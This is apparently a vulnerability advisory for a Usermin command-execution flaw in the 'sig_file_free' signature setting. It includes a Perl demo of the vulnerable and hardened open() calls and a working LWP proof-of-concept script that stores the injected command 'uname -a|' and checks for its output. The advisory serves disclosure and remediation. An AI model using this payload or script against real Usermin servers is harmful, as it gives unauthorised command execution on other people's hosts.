Usermin Remote Code Execution Vulnerability via Signature File Configuration

Vulnerability

A remote code execution vulnerability has been identified in Usermin versions 0.980 through 1.x prior to 1.660. The flaw is in the 'uconfig_save.cgi' script, which stores a user's per-module preferences: the 'sig_file_free' parameter (the path of the user's free-text signature file) is accepted without validation, and the same value is later handed to the 'get_signature' function, which reads it with the two-argument form of Perl's 'open()'. In that form Perl parses the string for a mode as well as a path, so a value ending in a pipe character ('|') is executed as a shell command whose output is read, and a value beginning with '|' is executed as a command whose input is written. An authenticated user can therefore store a command such as 'uname -a|' as their signature file; when the mail composer builds the signature, the command runs on the server and its output is inserted into the email composition interface.
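The open() pattern behind the advisory, as an added illustration that is not Usermin's own 'get_signature' code: the first function reproduces the two-argument open() behaviour, the second shows the three-argument form that only ever opens a file, with an added confinement of the path to the user's home directory. Function names, the '.signature' file and the temporary home directory are assumptions made for the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Vulnerable pattern (illustrative, not Usermin's code): two-argument open()
# interprets the string as mode plus path. A trailing '|' makes it a read pipe,
# so "uname -a|" runs uname -a and returns its output as the "signature".
sub get_signature_vulnerable {
    my ($sig_file) = @_;
    open(my $fh, $sig_file) or return '';
    local $/;                        # slurp the whole file (or pipe)
    my $sig = <$fh>;
    close($fh);
    return defined $sig ? $sig : '';
}

# Hardened pattern: three-argument open() with an explicit '<' mode never treats
# the path as a command. The path is also confined to the caller's home directory
# so the setting cannot point at arbitrary files (defence in depth).
sub get_signature_safe {
    my ($sig_file, $home) = @_;
    return '' if $sig_file eq '' || $sig_file =~ /\0/;
    my $abs = File::Spec->canonpath(File::Spec->rel2abs($sig_file, $home));
    return '' if grep { $_ eq '..' } File::Spec->splitdir($abs);   # no traversal
    return '' unless index($abs, "$home/") == 0;                   # stay under $home
    open(my $fh, '<', $abs) or return '';   # '|' is just a filename character here
    local $/;
    my $sig = <$fh>;
    close($fh);
    return defined $sig ? $sig : '';
}

# Demo with a throwaway home directory (assumption: a plain '.signature' file).
my $home = tempdir(CLEANUP => 1);
open(my $out, '>', "$home/.signature") or die "write: $!";
print $out "-- \nAlice\n";
close($out);

print "safe, real file:     ", get_signature_safe('.signature', $home);
print "safe, pipe payload:  [", get_signature_safe('uname -a|', $home), "]\n";        # empty: no such file
print "safe, traversal:     [", get_signature_safe('../../etc/passwd', $home), "]\n"; # empty: rejected
print "vulnerable, payload: ", get_signature_vulnerable('uname -a|');                 # runs uname -a
```

The decisive change is the explicit '<' mode: with three arguments Perl never re-parses the path string, so a leading or trailing '|' cannot turn a file read into a command execution. The home-directory check is a separate control against the same setting being used to read files the user should not see.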

Impact

Successful exploitation lets any authenticated Usermin user execute arbitrary commands on the server. Usermin runs a user's CGI requests under the account that user logged in as, so the commands run with the privileges of that Unix account; the practical effect is that any account able to log in to Usermin (for example a webmail-only account that is not meant to have shell access) gains command execution on the host.

Reproduction

To reproduce this vulnerability, an authenticated user sends a POST request to '/uconfig_save.cgi' with the 'sig_file_free' parameter set to a shell command followed by a pipe character, for example 'uname -a|'. Saving the setting succeeds, and when the user subsequently opens the mail composer the command is executed and its output appears in the 'reply_mail.cgi' page, where the signature is inserted.
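The request sequence above as an added reproduction script, not part of the advisory. The base URL, the 'usid' session cookie name and value, the marker string and the fact that no additional form fields are needed by 'uconfig_save.cgi' or 'reply_mail.cgi' are all assumptions, to be adjusted for a target you are authorised to test.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

# Assumptions: Usermin on its default port, and an already authenticated
# session whose cookie value is supplied in USERMIN_SID.
my $base = $ENV{USERMIN_URL} // 'https://usermin.example.test:20000';
my $sid  = $ENV{USERMIN_SID} // die "set USERMIN_SID to an authenticated session cookie\n";

my ($host) = $base =~ m{^https?://([^/:]+)} or die "bad USERMIN_URL\n";
my $jar = HTTP::Cookies->new;
$jar->set_cookie(0, 'usid', $sid, '/', $host);   # cookie name 'usid' is an assumption

my $ua = LWP::UserAgent->new(
    cookie_jar => $jar,
    ssl_opts   => { verify_hostname => 0 },      # self-signed certs are common on Usermin
);

# Step 1: store a "signature file" whose trailing '|' makes the two-argument
# open() in get_signature run it. The marker is added so the result is easy to
# find in the HTML; 'uname -a' is the command named in the advisory.
my $marker = 'USERMIN_SIG_FILE_CHECK';
my $save = $ua->post("$base/uconfig_save.cgi", {
    sig_file_free => "echo $marker; uname -a|",
});
die "uconfig_save.cgi: " . $save->status_line
    unless $save->is_success || $save->is_redirect;

# Step 2: open the compose form; the signature is built (and the command run) here.
my $reply = $ua->get("$base/reply_mail.cgi");
die "reply_mail.cgi: " . $reply->status_line unless $reply->is_success;

if ($reply->decoded_content =~ /\Q$marker\E/) {
    print "vulnerable: command output found in reply_mail.cgi\n";
} else {
    print "marker not found: version may be 1.660 or later, or the form needs extra fields\n";
}
```

Run it against a lab instance only; a positive result leaves the command stored in the user's preferences, so reset 'sig_file_free' afterwards.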

Remediation

Upgrade to Usermin version 1.660 or later, which fixes this vulnerability.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread          5.0
impact         10.0
exploitability  6.6
remediation     7.7
relevance       0.0
threat          6.5
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.